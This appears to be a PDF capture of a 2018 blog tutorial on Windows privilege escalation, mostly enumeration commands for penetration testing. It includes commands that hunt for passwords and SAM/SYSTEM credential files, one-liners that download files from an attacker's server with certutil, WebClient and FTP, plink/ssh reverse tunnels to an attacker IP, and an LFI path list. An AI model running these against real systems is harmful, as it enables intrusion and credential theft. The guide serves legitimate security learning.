Windows Privilege Escalation Guide
User Manual:
Open the PDF directly: View PDF 
.
Page Count: 14
| Download | |
| Open PDF In Browser | View PDF |
15/10/2018
Windows Privilege Escalation Guide
Windows Privilege Escalation Guide
Posted on January 26, 2018
Privilege escalation always comes down to proper enumeration. But to accomplish
proper enumeration you need to know what to check and look for. This takes
familiarity with systems that normally comes along with experience. At rst privilege
escalation can seem like a daunting task, but after a while you start to lter through
what is normal and what isn’t. It eventually becomes easier to know what to look for
rather than digging through everything hoping to nd that needle in the haystack.
Hopefully this guide will provide a good foundation to build upon and get you started.
This guide is in uenced by g0tm1lk’s Basic Linux Privilege Escalation
(https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/), which at some
point you should have already seen and used. I wanted to try to mirror his guide,
except for Windows. So this guide will mostly focus on the enumeration aspect.
Note: I am not an expert and still learning myself.
Guide Layout
In each section I rst provide the old trusted CMD commands and then also a
Powershell equivalent for posterity sake. It’s good to have both tools under your belt
and Powershell is much more versatile for scripting than the traditional CMD.
However there isn’t a Powershell equivalent for everything (or CMD is still simply
easier/better on certain things), so some sections will only contain regular CMD
commands.
Version 1.2 - Last updated July 2018
Operating System
What is the OS and architecture? Is it missing any patches?
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
1/14
15/10/2018
Windows Privilege Escalation Guide
systeminfo
wmic qfe
Is there anything interesting in environment variables? A domain controller in
LOGONSERVER ?
set
Get-ChildItem Env: | ft Key,Value
Are there any other connected drives?
net use
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSyste
Users
Who are you?
whoami
echo %USERNAME%
$env:UserName
Any interesting user privileges? Note: The State column does not mean that the user does
or does not have access to this privilege. If the privilege is listed, then that user has it.
whoami /priv
What users are on the system? Any old user pro les that weren’t cleaned up?
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
2/14
15/10/2018
Windows Privilege Escalation Guide
net users
dir /b /ad "C:\Users\"
dir /b /ad "C:\Documents and Settings\" # Windows XP and below
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
Is anyone else logged in?
qwinsta
What groups are on the system?
net localgroup
Get-LocalGroup | ft Name
Are any of the users in the Administrators group?
net localgroup Administrators
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
Anything in the Registry for User Autologon?
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nu
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Win
Anything interesting in Credential Manager?
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
3/14
15/10/2018
Windows Privilege Escalation Guide
cmdkey /list
dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentia
Can we access SAM and SYSTEM les?
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
Programs, Processes, and Services
What software is installed?
dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
Are there any weak folder or le permissions?
Full Permissions for Everyone or Users on Program Folders?
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
4/14
15/10/2018
Windows Privilege Escalation Guide
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\
Modify Permissions for Everyone or Users on Program Folders?
icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone
icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { G
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { G
You can also upload accesschk from Sysinternals to check for writeable folders and
les.
accesschk.exe -qwsu "Everyone" *
accesschk.exe -qwsu "Authenticated Users" *
accesschk.exe -qwsu "Users" *
What are the running processes/services on the system? Is there an inside service not
exposed? If so, can we open it? See Port Forwarding in Appendix.
tasklist /svc
tasklist /v
net start
sc query
Get-Process has a -IncludeUserName option to see the process owner, however you
have to have administrative rights to use it.
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
5/14
15/10/2018
Windows Privilege Escalation Guide
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName,
Get-Service
This one liner returns the process owner without admin rights, if something is blank
under owner it’s probably running as SYSTEM, NETWORK SERVICE, or LOCAL
SERVICE.
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlik
Any weak service permissions? Can we recon gure anything? Again, upload accesschk.
accesschk.exe -uwcqv "Everyone" *
accesschk.exe -uwcqv "Authenticated Users" *
accesschk.exe -uwcqv "Users" *
Are there any unquoted service paths?
wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Aut
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode
What scheduled tasks are there? Anything custom implemented?
schtasks /query /fo LIST 2>nul | findstr TaskName
dir C:\windows\tasks
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskNam
What is ran at startup?
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
6/14
15/10/2018
Windows Privilege Escalation Guide
wmic startup get caption,command
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
Get-CimInstance Win32_StartupCommand | select Name, command, Location, User
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Win
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Win
Get-ItemProperty -Path 'Registry::HKEY_CURRENT_USER\Software\Microsoft\Wind
Get-ItemProperty -Path 'Registry::HKEY_CURRENT_USER\Software\Microsoft\Wind
Get-ChildItem "C:\Users\All Users\Start Menu\Programs\Startup"
Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup"
Is AlwaysInstallElevated enabled? I have not ran across this but it doesn’t hurt to check.
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInsta
Networking
What NICs are connected? Are there multiple networks?
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
What routes do we have?
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
7/14
15/10/2018
Windows Privilege Escalation Guide
Anything in the ARP cache?
arp -a
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress
Are there connections to other hosts?
netstat -ano
Anything in the hosts le?
C:\WINDOWS\System32\drivers\etc\hosts
Is the rewall turned on? If so what’s con gured?
netsh
netsh
netsh
netsh
firewall show state
firewall show config
advfirewall firewall show rule name=all
advfirewall export "firewall.txt"
Any other interesting interface con gurations?
netsh dump
Are there any SNMP con gurations?
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
Interesting Files and Sensitive Information
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
8/14
15/10/2018
Windows Privilege Escalation Guide
This section may be a little noisy so you may want to output commands into txt les to
review and parse as you wish.
Any passwords in the registry?
reg query HKCU /f password /t REG_SZ /s
reg query HKLM /f password /t REG_SZ /s
Are there sysprep or unattend les available that weren’t cleaned up?
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.tx
Get-Childitem –Path C:\ -Include *unattend*,*sysprep* -File -Recurse -Error
If the server is an IIS webserver, what’s in inetpub? Any hidden directories? web.con g
les?
dir /a C:\inetpub\
dir /s web.config
C:\Windows\System32\inetsrv\config\applicationHost.config
Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAc
What’s in the IIS Logs?
C:\inetpub\logs\LogFiles\W3SVC1\u_ex[YYMMDD].log
C:\inetpub\logs\LogFiles\W3SVC2\u_ex[YYMMDD].log
C:\inetpub\logs\LogFiles\FTPSVC1\u_ex[YYMMDD].log
C:\inetpub\logs\LogFiles\FTPSVC2\u_ex[YYMMDD].log
Is XAMPP, Apache, or PHP installed? Any there any XAMPP, Apache, or PHP
con guration les?
dir /s php.ini httpd.conf httpd-xampp.conf my.ini my.cnf
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
9/14
15/10/2018
Windows Privilege Escalation Guide
Get-Childitem –Path C:\ -Include php.ini,httpd.conf,httpd-xampp.conf,my.ini
Any Apache web logs?
dir /s access.log error.log
Get-Childitem –Path C:\ -Include access.log,error.log -File -Recurse -Error
Any interesting les to look at? Possibly inside User directories (Desktop, Documents,
etc)?
dir /s *pass* == *vnc* == *.config* 2>nul
Get-Childitem –Path C:\Users\ -Include *password*,*vnc*,*.config -File -Rec
Files containing password inside them?
findstr /si password *.xml *.ini *.txt *.config 2>nul
Get-ChildItem C:\* -include *.xml,*.ini,*.txt,*.config -Recurse -ErrorActio
Appendix
Enumeration Script
I’ve created a Powershell script which pretty much automates all of the above. You can
check it out here (https://github.com/absolomb/WindowsEnum).
Transferring Files
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
10/14
15/10/2018
Windows Privilege Escalation Guide
At some point during privilege escalation you will need to get les onto your target.
Below are some easy ways to do so.
Powershell Cmdlet (Powershell 3.0 and higher)
Invoke-WebRequest "https://myserver/filename" -OutFile "C:\Windows\Temp\fil
Powershell One-Liner
(New-Object System.Net.WebClient).DownloadFile("https://myserver/filename",
Powershell Script
echo
echo
echo
echo
$webclient = New-Object System.Net.WebClient >>wget.ps1
$url = "http://IPADDRESS/file.exe" >>wget.ps1
$file = "output-file.exe" >>wget.ps1
$webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -
Non-interactive FTP via text le. Useful for when you only have limited command
execution.
echo
echo
echo
echo
echo
echo
open 10.10.10.11 21> ftp.txt
USER username>> ftp.txt
mypassword>> ftp.txt
bin>> ftp.txt
GET filename>> ftp.txt
bye>> ftp.txt
ftp -v -n -s:ftp.txt
CertUtil
certutil.exe -urlcache -split -f https://myserver/filename outputfilename
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
11/14
15/10/2018
Windows Privilege Escalation Guide
Port Forwarding
This is useful for exposing inside services that aren’t available from outside the
machine, normally due to rewall settings.
Upload plink.exe to target.
Start SSH on your attacking machine.
For example to expose SMB, on the target run:
plink.exe -l root -pw password -R 445:127.0.0.1:445 YOURIPADDRESS
As of Windows 10 1803 (April 2018 Update), ssh client is now included and turned on by
default! So you’re able use ssh to do port forwarding right out of the box now.
ssh -l root -pw password -R 445:127.0.0.1:445 YOURIPADDRESS
Local File Inclusion List
This is not an exhaustive list, installation directories will vary, I’ve only listed common
ones.
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
12/14
15/10/2018
Windows Privilege Escalation Guide
C:\Apache\conf\httpd.conf
C:\Apache\logs\access.log
C:\Apache\logs\error.log
C:\Apache2\conf\httpd.conf
C:\Apache2\logs\access.log
C:\Apache2\logs\error.log
C:\Apache22\conf\httpd.conf
C:\Apache22\logs\access.log
C:\Apache22\logs\error.log
C:\Apache24\conf\httpd.conf
C:\Apache24\logs\access.log
C:\Apache24\logs\error.log
C:\Documents and Settings\Administrator\NTUser.dat
C:\php\php.ini
C:\php4\php.ini
C:\php5\php.ini
C:\php7\php.ini
C:\Program Files (x86)\Apache Group\Apache\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache\logs\access.log
C:\Program Files (x86)\Apache Group\Apache\logs\error.log
C:\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache2\logs\access.log
C:\Program Files (x86)\Apache Group\Apache2\logs\error.log
c:\Program Files (x86)\php\php.ini"
C:\Program Files\Apache Group\Apache\conf\httpd.conf
C:\Program Files\Apache Group\Apache\conf\logs\access.log
C:\Program Files\Apache Group\Apache\conf\logs\error.log
C:\Program Files\Apache Group\Apache2\conf\httpd.conf
C:\Program Files\Apache Group\Apache2\conf\logs\access.log
C:\Program Files\Apache Group\Apache2\conf\logs\error.log
C:\Program Files\FileZilla Server\FileZilla Server.xml
C:\Program Files\MySQL\my.cnf
C:\Program Files\MySQL\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.cnf
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.1\my.cnf
C:\Program Files\MySQL\MySQL Server 5.1\my.ini
C:\Program Files\MySQL\MySQL Server 5.5\my.cnf
C:\Program Files\MySQL\MySQL Server 5.5\my.ini
C:\Program Files\MySQL\MySQL Server 5.6\my.cnf
C:\Program Files\MySQL\MySQL Server 5.6\my.ini
C:\Program Files\MySQL\MySQL Server 5.7\my.cnf
C:\Program Files\MySQL\MySQL Server 5.7\my.ini
C:\Program Files\php\php.ini
C:\Users\Administrator\NTUser.dat
C:\Windows\debug\NetSetup.LOG
C:\Windows\Panther\Unattend\Unattended.xml
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
13/14
15/10/2018
Windows Privilege Escalation Guide
C:\Windows\Panther\Unattended.xml
C:\Windows\php.ini
C:\Windows\repair\SAM
C:\Windows\repair\system
C:\Windows\System32\config\AppEvent.evt
C:\Windows\System32\config\RegBack\SAM
C:\Windows\System32\config\RegBack\system
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SecEvent.evt
C:\Windows\System32\config\SysEvent.evt
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\winevt\Logs\Application.evtx
C:\Windows\System32\winevt\Logs\Security.evtx
C:\Windows\System32\winevt\Logs\System.evtx
C:\Windows\win.ini
C:\xampp\apache\conf\extra\httpd-xampp.conf
C:\xampp\apache\conf\httpd.conf
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
C:\xampp\FileZillaFTP\FileZilla Server.xml
C:\xampp\MercuryMail\MERCURY.INI
C:\xampp\mysql\bin\my.ini
C:\xampp\php\php.ini
C:\xampp\security\webdav.htpasswd
C:\xampp\sendmail\sendmail.ini
C:\xampp\tomcat\conf\server.xml
Tags: guides
← PREVIOUS POST (/2018-01-23-UNDERTHEWIRE-CYBORG/)
NEXT POST → (/2018-02-24-HACKTHEBOX-MANTIS-WRITEUP/)
(https://github.com/absolomb)
(mailto:YmxvZ0BhYnNvbG9tYi5jb20=)
Ryan McFarland • 2018
Theme by beautiful-jekyll (http://deanattali.com/beautiful-jekyll/)
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
14/14
Source Exif Data:
File Type : PDF File Type Extension : pdf MIME Type : application/pdf PDF Version : 1.4 Linearized : No Page Count : 14 Creator : Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 Producer : Skia/PDF m69 Create Date : 2018:10:15 10:27:51+00:00 Modify Date : 2018:10:15 10:27:51+00:00EXIF Metadata provided by EXIF.tools